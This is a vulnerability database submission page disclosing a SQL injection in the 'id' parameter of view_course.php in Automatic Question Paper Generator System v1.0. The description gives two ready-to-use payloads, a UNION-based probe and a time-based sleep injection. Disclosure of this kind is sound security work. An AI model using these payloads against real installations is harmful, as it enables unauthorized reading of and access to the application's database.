Submit #102701: Automatic Question Paper Generator System v1.0 /aqpg/admin/courses/view_course.php GET parameter id exists SQL injection vulnerabilityinfo

TitleAutomatic Question Paper Generator System v1.0 /aqpg/admin/courses/view_course.php GET parameter id exists SQL injection vulnerability
DescriptionAn issue was discovered in Automatic Question Paper Generator System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /aqpg/admin/courses/view_course.php?id. Payload1:id=1' union all select null,null,concat(0x75767778,0x45464748),null,null,null,null,null-- - Payload2:id=1' and (select 6 from (select(sleep(20)))d)-- e
Source⚠️ https://github.com/SecurityYH/bug_report/blob/main/SQLi-1.md
User
 Evan (UID 43177)
Submission03/17/2023 06:23 (3 years ago)
Moderation03/17/2023 07:23 (1 hour later)
StatusAccepted
VulDB entry223285 [SourceCodester Automatic Question Paper Generator System 1.0 GET Parameter view_course.php ID sql injection]
Points20

PreviousOverviewNext

Want to stay up to date on a daily basis?

Enable the mail alert feature now!